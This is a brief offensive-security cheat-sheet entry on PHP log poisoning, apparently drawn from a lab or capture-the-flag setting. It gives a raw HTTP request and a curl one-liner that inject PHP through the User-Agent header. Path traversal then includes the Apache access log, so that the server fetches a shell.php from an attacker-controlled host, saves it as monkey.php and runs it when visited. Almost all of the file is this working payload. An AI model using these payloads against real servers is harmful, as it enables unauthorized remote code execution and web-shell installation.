killchain-compendium/exploit/web/php/php_user_agent_rce.md

736 B

RCE inside HTTP Request

  • a.k.a. Log Poisoning
  • User Agent can be filled with php code
GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1
Host: 10.10.59.238
User-Agent: <?php file_put_contents('monkey.php',file_get_contents('http://<attacker-IP>:<attacker-Port>/shell.php')); ?>
[...]
  • copied from browser as curl command:
curl 'http://10.10.211.157/?ext=%20HTTP/1.1&view=./dog/../../../../var/log/apache/access.log' -H "User-Agent: <?php file_put_contents('monkey.php', file_get_contents('http://10.9.7.193:8000/shell.php'));?>"
  • go to the access log
10.10.211.157/?ext=.log&view=./dog/../../../../var/log/apache2/access
  • Afterwards visit 10.10.211.157/monkey.php